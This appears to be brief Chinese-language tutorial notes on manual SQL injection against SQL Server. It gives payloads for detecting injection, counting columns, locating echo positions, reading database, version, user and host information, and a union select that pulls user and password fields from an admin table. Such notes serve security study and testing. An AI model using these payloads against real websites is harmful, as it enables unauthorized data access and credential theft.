企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 判断是否存在注入 ~~~ ’ and 1=1 and 1=2 观看页面回显 ~~~ ## 判断列数 ~~~ order by ~~~ ## 查看回显位置 由于sqlsever对于类型是比较严谨的,需要跟每行对应的数据类型相同,所以在查看回显位置的时候,也需要通过设置相关的类型,也可以用null空,但是不会显示 ``` union select 1,'2','3' ``` ## 查询信息 ~~~ db_name() 数据库名 @@version 版本信息 User_Name() 当前用户 host_name() 计算机名称 ~~~ ## 查询数据 ``` 需要知道列名和表名 union select 1,user,pass from admin ```